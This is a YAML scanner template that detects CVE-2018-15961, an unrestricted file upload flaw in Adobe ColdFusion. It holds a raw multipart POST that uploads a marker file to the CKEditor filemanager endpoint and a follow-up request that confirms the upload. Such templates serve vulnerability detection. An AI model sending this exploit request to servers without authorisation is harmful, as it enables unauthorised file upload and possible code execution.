id: coldfusion-upload-file
single: true
info:
  name: Unrestricted file upload in Adobe ColdFusion (CVE-2018-15961)
  risk: Medium

variables:
  - ran: RandomString(8)

requests:
  - method: POST
    redirect: false
    raw: |
      POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
      Host: {{.Host}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
      Content-Type: multipart/form-data; boundary=---------------------------24464570528145
      Content-Length: 303
      Connection: close
      Upgrade-Insecure-Requests: 1

      -----------------------------24464570528145
      Content-Disposition: form-data; name="file"; filename="{{.ran}}"
      Content-Type: image/jpeg

      <s>{{.ran}}
      -----------------------------24464570528145
      Content-Disposition: form-data; name="path"

      shell
      -----------------------------24464570528145--

  # verify if shell uploaded or not
  - method: GET
    redirect: false
    url: >-
      {{.BaseURL}}/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{.ran}}
    detections:
      - >-
        StatusCode() == 200 && (RegexSearch("resHeaders", ".*Content-Type:.*octet-stream") || RegexSearch("resHeaders", "text/plain")) && StringSearch("response", "<s>{{.ran}}")

reference:
  - links:
      - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md